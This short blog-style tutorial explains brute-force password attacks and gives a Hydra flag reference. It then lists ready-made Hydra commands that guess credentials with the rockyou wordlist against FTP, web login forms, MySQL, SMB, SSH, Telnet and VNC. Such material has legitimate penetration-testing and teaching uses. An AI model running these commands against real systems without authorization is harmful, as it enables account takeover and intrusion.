Brute-Force with Hydra

What is brute-force

Known as brute force, it consists of an attempt to crack a password or a username, finding a web page to hide, or discovering a key used to encrypt a message, using a trial and error approach and hoping that, at some point, it will be possible to guess. This is an old attack method, but it is still popular and effective among hackers.


For a better understanding it is necessary to know how the Hydra tool works, so here below I will leave a manual.

-LSet a wordlist for user testing.
-lDefine which user is to be tested.
-PSet a wordlist for password testing.
-pDefine which password is to be tested.
-FWhen you get a valid combination the test will be finished.
-sDefines which port will be tested.
-tSets the number of tests per second (Hydra’s default is 16).
-vActivate verbose mode, it shows everything being tested.
-VEnables extended verbose mode, this way will show the tested
username and password combination.

Brute-force in services


hydra -l <user> -P /usr/share/wordlist/rockyou.txt <IP> ftp

HTTP – Post Form

hydra -l <user> -P /usr/share/wordlist/rockyou.txt < or IP>  http-post-form "/caminho/login.php:name=^USER^&password=^PASS^&enter=Sign+in:error message"


hydra -l <usuario> -P /usr/share/wordlist/rockyou.txt <IP> mysql


hydra -l Administrator -P /usr/share/wordlist/rockyou.txt <IP> smb -t 1


hydra -l root -P /usr/share/wordlist/rockyou.txt [-t 32] <IP> ssh


hydra -l root -P /usr/share/wordlist/rockyou.txt [-t 32] <IP> telnet


hydra -P /usr/share/wordlist/rockyou.txt -s <PORT> <IP> vnc

Leave a Reply

Your email address will not be published. Required fields are marked *